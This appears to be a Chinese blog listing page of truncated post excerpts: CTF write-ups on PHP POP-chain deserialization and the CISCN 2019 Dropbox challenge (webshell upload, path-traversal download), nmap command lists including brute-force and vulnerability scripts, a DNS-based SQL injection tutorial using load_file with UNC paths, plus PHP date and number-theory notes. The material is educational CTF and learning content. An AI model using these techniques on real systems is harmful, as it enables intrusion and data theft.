pop链反序列化的简单应用
我们来看题目源码
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263Welcome to index.php<?php//flag is in flag.php//WTF IS THIS?//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95//And Crack It!class Modifier { protected $var; public function append($value){ include($value); } public function __invoke(){ $this->appe ...
php学习(5):文件包含
今天学习高级部分先从简单的开始,时间和日期:123<?phpecho "Time is".date("h, i, sa");?>
解释一下,
1234h: houri: minutes: seconda:小写的am,pm后缀
显示如图所示。
在网站上可以自动更新版权年份:
12345<html><body>©-<?php echo date("Y");?></body></html>
如图所示。
最简单的年月日表示:
12345<?phpecho "Today is ".date("Y-m-d")."<br>";echo "Today is ".date("Y.m.d")."<br>";#此处表示年月日echo "Today is ".date("l" ...
CISCN2019 华北赛区 Day1 Web1 Dropbox
打开之后先注册一个用户,然后登陆,看到可以传输文件,传一个木马改jpg上去看到可以下载,先打开burpsuite抓个包,然后输入cookie在burp上进入我们那个用户。
可以看到进入我们那个用户了,能看到我们注册的用户上传的文件。
下载文件在download.php,
而且文件变量叫filename,所以抓个下载包。
可以看出光下载我们的文件是没用的,我这个文件是用来getshell的,只不过本题不能这样,我们可以在这里下载源码
post传参下载,注意我一开始传的../../../报错说找不到文件,需要传../../即可
这个需要经验积累,或者只能尝试了。
我们在源码里面找到了还有class.php和login.php,全下载下来看看。
又在这里找到了register.php,找到的都下载!
看到下面有file_get_contents()也就是只要让filename是flag.txt就能读出,还要想办法让其回显。
我们看到了class.php中的析构函数
12__construct()__destruct()
两个函数分别是在类实例化时和调用结束时触发,也就是con ...
nmap基础命令
nmap基础命令nmap -F ip -T4快速扫描,但信息可能较少
nmap ip -A 全部扫描,非常详细
nmap -sP ip 通信扫描,如果无法ping通则扫描失败
nmap 直接加ip范围,扫描同一局域网主机
nmap —script=auth 电脑ip 对目标主机及所在网段进行弱口令检测
nmap —script=brute 电脑ip 暴力破解如数据库,SMB,SNMP等
nmap —script=vuln ip 查看目标ip是否存在常见漏洞
nmap -sF -T4 ip 探测防火墙状态
nmap -sV ip探测目标地址开放端口以及对应服务版本
nmap -sP ip范围,扫描在线主机
nmap ip范围 -exclude ip 除了此ip以外的所有ip
nmap ip -p 80,21,22对指定ip的端口扫描
nmap —traceroute ip 进行路由跟踪
nmap -sF/sA ACK 或FIN扫描,很隐蔽,不容易被发现,TCP扫描的一种
nmap -sU UDP扫描,可靠度不高。一般仅扫描53(dns)和161(smap)端口。
DNS注入基础-避免频繁访问被封ip
先来将SQL基础,这里用不一样的方式打开数据库
启动cmd,在mysql的二进制文件目录下启动CMD,并且输入mysql
数据库已经启动
当然,如果你之前设置过密码,启动的时候输入mysql -uroot -p然后输入密码并且启动;
启动之后可以查看当前数据库show databases;
记得每句话要加分号,我们可以先选定一个数据库,use+数据库;
然后select database();查看当前数据库
现在尝试concat(拼接字符)
concat(‘a’,’b’);
看图的下面你也同样看到了其他的语句结合我们刚才用dnslog.cn做的实验查到的域名做拼接
语句在图中,并且可以尝试一个新函数load_file();
特别注意,WWW下的文件是可以在网页中执行的,所以是正斜杠,但是我们复制文件路径的时候是反斜杠,自己要改过来
同时还可以读取远程文件,刚才是读本地文件
要用unc路径即//+域名
select load_file(‘//www.mss.cn/2.txt’);
读取远程文件必先用dns服务器转换域名
要通过ip来找服务器
我们先select concat(‘//‘, ...
数论(二)费马小定理
模逆如果p是一个素数,那么在有限域$\mathbb{Z}/p\mathbb{Z}$中的每一个非零元素都有一个乘法逆,也就是说,存在一个数b满足
ab \equiv 1 (mod\ p).$$ 我们把b记作$a^{-1}\ mod\ p$.
证明显然由裴蜀定理可得。
既然p是素数,上述定理,我们还可以写为:当p是素数,那么$$(\mathbb{Z}/p\mathbb{Z})^* = {1,2,3,4,\dots,p-1}也就是说0被从$\mathbb{Z}/p\mathbb{Z}$里面去掉了,并且剩下的元素都是单位元且对乘法封闭。
高次模对于原根,我们来看这样一个好玩的情况,我们可以尝试,选取以下运算模数都为7\
::: center $1^1 \equiv 1$ $1^2 \equiv 1$ $1^3 \equiv 1$ $1^4 \equiv 1$ $1^5 \equiv 1$ $1^6 \equiv 1$
$2^1 \equiv 2$ $2^2 \equiv 4$ $2^3 \equiv 1$ $2^4 \equiv 2$ $2^5 ...